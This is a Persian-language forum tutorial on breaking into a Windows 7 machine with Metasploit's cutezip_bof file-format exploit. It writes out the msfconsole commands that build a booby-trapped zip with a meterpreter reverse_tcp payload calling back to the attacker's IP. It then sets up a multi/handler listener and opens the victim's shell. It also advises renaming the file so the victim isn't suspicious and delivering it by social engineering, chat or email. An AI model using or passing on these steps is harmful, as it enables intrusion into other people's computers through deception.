برا تو
برا تو

امتیاز موضوع:
  • 0 رای - 0 میانگین
  • 1
  • 2
  • 3
  • 4
  • 5

[-]
کلمات کلیدی
ان اموزش نفوذ به ویندوز هفت با cutezip bof کالی

رایگان ان اموزش نفوذ به ویندوز هفت با cutezip_bof کالی
#1
در این نوع حمله ما با استفاده از متااسپلویت اقدام به ایجاد یک فایل ورد با پسوند zip میکنیم و سپس این فایل رو از طرق مختلف مثل ( مهندسی اجتماعی – چت – ایمیل و . . . ) به تارگت میدهیم .


بعد از اجرا و باز کردن فایل توسط تاگت ما موتوانیم از سیستم قربانی دسترسی بگیریم .
خوب بریم سراغ اموزش اصلی :
تارکت :Wing FTP 4.3.8
سیستم عامل حمله : کالی لینوکس یا بک ترک5
سیستم عامل تارگت : ویندوز 7
گام اول :در ابتدا وارد بک ترک بشید و یه ترمینال جدید باز کنید و دستور
کد HTML:
Msfconsole 
رو بنویسید و اینتر کنید ( البته میتونید از Armitage هم استفاده کنید . تفاوتی نداره ) .
گام دوم : حالا با استفاده از دستور use

کد HTML:
exploit/windows/fileformat/cutezip_bof 
وارد محیط اکسپلویت بشید .
گام سوم : در اینجا کافیه یه show options بگیرید تا بهتون بگه چه مقادیری رو باید ست کنید
گام چهارم : مقادیر زیر را عینا ست کنید در صورت اینکه مثلا مشکل پیش اومد خودتون بنویسید 



کد HTML:
msf exploit (cutezip_bof)>set payload windows/meterpreter/reverse_tcp 
کد HTML:
msf exploit (cutezip_bof)>set lhost 192.168.1.2 
کد HTML:
msf exploit (cutezip_bof)>exploit 
در اینجا ایپی 192.168.1.2 همون ایپی **ر یا ایپی خودتون هست که باید جایگزین کنید .
گام پنجم : بعد از اکسپلویت یک فایل با پسوند zip و نام msf در شاخه زیر ایجا میشود که باید این فایل رو تغییر نام بدید تا تارگت شک نکنه و متوجه حمله ما نشود .

کد HTML:
/root/.msf4/local/msf.zip 
و باعد با استفاده از دستورات زیر کامپیوتر خودمون رو اماده گرفتن اکسس از تارگت میکنیم . یه چیزی تو مایه های گوش ایستادن .

کد HTML:
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp 
set lhost 192.168.1.2 
exploit 
در اخر هم فایل ایجاد شده در مرحله قبل را به هر طریقی که شده به تارگت میدیم تا اجرا کنه . ( چت – مهندسی اجتماعی – ایمیل و . . . ) . به محض باز کردن فایل توسط تارگت ما از سیستم تارگت شل میگیریم و میتونیم برای مرحله بعد حمله خودمون رو اماده کنیم .
برای دسترسی به شل هم کافیه یک بار دستور Sessions -l رو وارد کنید . اگر شل گرفته باشید برای شما نشون میده . که یک ایدی هم داره سپس درستور Sessions -l رو به همراه ایدی وارد کنید تا به شل تارگت وصل بشید . به ایین ترتیب:


sessions -i ID



برای تشکر از نویسنده روی سپاس کلیک کنید
پاسخ }}}}


پرش به انجمن:


کاربران در حال بازدید این موضوع: 1 مهمان